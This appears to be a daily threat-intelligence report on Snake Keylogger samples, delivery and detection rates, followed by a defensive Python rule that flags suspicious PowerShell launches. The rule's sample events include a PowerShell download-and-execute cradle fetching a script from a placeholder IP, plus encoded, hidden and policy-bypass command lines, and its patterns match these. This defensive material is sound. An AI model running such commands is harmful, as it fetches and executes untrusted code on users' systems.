Daily Summary
Snake Keylogger activity remains stable on 2026-04-30, with 9 new samples detected against a 7-day average of 8, roughly a 13% increase (9 against 8). This marks a steady plateau after last week's moderate surge, with no significant spike or drop observed. The trend remains within normal fluctuation ranges, indicating a sustained operational tempo by the threat actors.
New Samples Detected
PowerShell scripts (.ps1) dominate today's haul at 6 of 9 samples, followed by 2 batch files (.bat) and 1 dynamic link library (.dll). This is a clear shift toward script-based delivery over traditional executable payloads; the lone .dll is more consistent with a staged infection chain (a script that fetches and side-loads the payload) than with a stand-alone dropper. Observed file names are randomized alphanumeric strings, a departure from the earlier themed lures. The script-heavy mix is the kind of change that tends to reduce static, signature-based detection, since scripts are trivially re-obfuscated between builds.
Distribution Methods
Today's sample set points to phishing emails with script attachments, likely disguised as invoices or delivery confirmations. The prevalence of .ps1 and .bat files suggests attackers are relying on Windows-native script hosts (cmd.exe and powershell.exe) to sidestep macro-blocking policies. No malicious Office documents were detected, which is consistent with a pivot from macro-laden attachments to lightweight downloaders that fetch the main payload. Campaign timing aligns with Tuesday-to-Thursday business-hours targeting, consistent with prior Snake Keylogger operations.
Detection Rate
Current AV engine coverage against these 9 samples is moderate: 4 of 9 are flagged as malicious by at least 5 engines on VirusTotal, while the remaining 5 show detection rates below 30%. Low rates on fresh samples usually mean the newer variants are obfuscated or packed to evade signature matching; expect the numbers to climb over the next few days as vendors add signatures, so the ratios above should be re-checked rather than treated as final. Heuristic and behavior-based detection (including AMSI inspection of PowerShell content at run time) remains the primary line of defense.
C2 Infrastructure
No new C2 servers were identified today, and no active infrastructure changes were noted. The absence of new domains or IP shifts suggests the threat actors are reusing C2 nodes already seen last week. This stability may indicate a maintenance phase or a deliberate operational-security pause; existing blocklists remain effective until it ends.
7-Day Trend
This week’s activity remains consistent with the 7-day moving average, with daily counts fluctuating between 7 and 9 samples since April 24. There is no clear upward or downward trajectory, suggesting the campaign has reached a steady state with no signs of escalation or decline.
Security Analysis
A non-obvious observation is that the shift to script-based delivery (6 .ps1 files today versus none on some prior days) may reflect attackers compensating for Microsoft's tightening of VBA macros. This tactic echoes early 2024 campaigns where PowerShell was used as a drop-in replacement for macros. Actionable recommendation: enforce PowerShell Constrained Language Mode through an AppLocker or WDAC application-control policy rather than the __PSLockdownPolicy environment variable, which a local user or script can simply clear. Note that Constrained Language Mode does not block script execution outright; it removes the arbitrary .NET and COM access that downloaders and keylogger stagers depend on, so it should be paired with script block logging (PowerShell Event ID 4104) to capture de-obfuscated script content. On the detection side, alert on process-creation events in which cmd.exe (the launcher for the .bat samples), wscript.exe or cscript.exe, or the mail client spawns powershell.exe, especially with -EncodedCommand, -WindowStyle Hidden or an execution-policy bypass on the command line.
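The process-creation check recommended above, written out as an added example for this report (it is not tooling from the report's authors). It assumes Sysmon Event ID 1 records have been flattened to key=value lines with the Image, ParentImage and CommandLine fields; the six events, the paths, the user name, the IP address and the base64 blob are constructed for the example, and the indicator weights and the suspicious-parent list are hand-tuned assumptions that a real deployment would adjust to its own baseline.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 (process creation) records, flattened to
# key=value lines for this example. Paths, user names, the IP address and the
# base64 blob are made up; none of this is telemetry from the report.
SAMPLE_EVENTS = [
    # 1: batch-file launcher, the chain a .bat attachment would produce
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=\"powershell.exe -nop -w hidden -ep bypass -enc QQBBAEEAQQA=\"",
    # 2: admin script started from the desktop shell, no suspicious flags
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=\"powershell.exe -File C:\\Scripts\\backup.ps1\"",
    # 3: script host dropping into PowerShell with a download cradle
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\wscript.exe "
    "CommandLine=\"powershell.exe -ep bypass -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.23/s.ps1')\"",
    # 4: unrelated child process, ignored by the rule
    "Image=C:\\Windows\\System32\\notepad.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=\"notepad.exe invoice.txt\"",
    # 5: mail client spawning a hidden PowerShell from the user's Temp folder
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\" "
    "CommandLine=\"powershell.exe -WindowStyle Hidden -File "
    "C:\\Users\\jdoe\\AppData\\Local\\Temp\\inv_8841.ps1\"",
    # 6: plain cmd.exe -> powershell.exe with no flags: low-priority review item
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=\"powershell.exe -File C:\\ProgramData\\maint\\cleanup.ps1\"",
]

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Assumed parent set: launchers seen in script-attachment chains. Tune per estate.
SUSPICIOUS_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                      "outlook.exe", "winword.exe", "excel.exe"}
PARENT_WEIGHT = 3

# Command-line indicators with hand-chosen weights (assumptions, not vendor rules).
FLAG_PATTERNS = [
    (re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command", 3),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window", 3),
    (re.compile(r"-nop(?:rofile)?\b", re.I), "no profile", 1),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), "execution policy bypass", 2),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
                r"invoke-expression", re.I), "download/eval cradle", 3),
]

# Matches key=value or key="value with spaces".
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Split one flattened event line into a field dictionary."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def score_command_line(cmd: str):
    """Return (score, matched indicator labels) for a PowerShell command line."""
    score, hits = 0, []
    for pattern, label, weight in FLAG_PATTERNS:
        if pattern.search(cmd):
            score += weight
            hits.append(label)
    return score, hits


def evaluate_event(event: dict):
    """Return an alert dict for a suspicious PowerShell launch, or None."""
    child = ntpath.basename(event.get("Image", "")).lower()
    if child not in POWERSHELL_HOSTS:
        return None
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    score, hits = score_command_line(event.get("CommandLine", ""))
    if parent in SUSPICIOUS_PARENTS:
        score += PARENT_WEIGHT
        hits.insert(0, f"spawned by {parent}")
    if score < 3:          # benign parent and no flags: nothing to raise
        return None
    return {"parent": parent, "child": child, "score": score,
            "level": "high" if score >= 6 else "medium", "indicators": hits}


def detect(lines) -> list:
    """Run the rule over flattened event lines and collect alerts in order."""
    alerts = []
    for line in lines:
        alert = evaluate_event(parse_event(line))
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['level']:6}] score={a['score']:2} {a['parent']} -> {a['child']}: "
              + ", ".join(a["indicators"]))
```

Events 1, 3 and 5 score high, event 6 (a bare cmd.exe to powershell.exe launch) is flagged at medium so that legitimate batch wrappers can be reviewed and baselined rather than silently dropped, and events 2 and 4 produce nothing. The parent bonus is what keeps a flag-free launch from the mail client or a script host visible, which is the pattern the .bat and .ps1 attachments described above would produce.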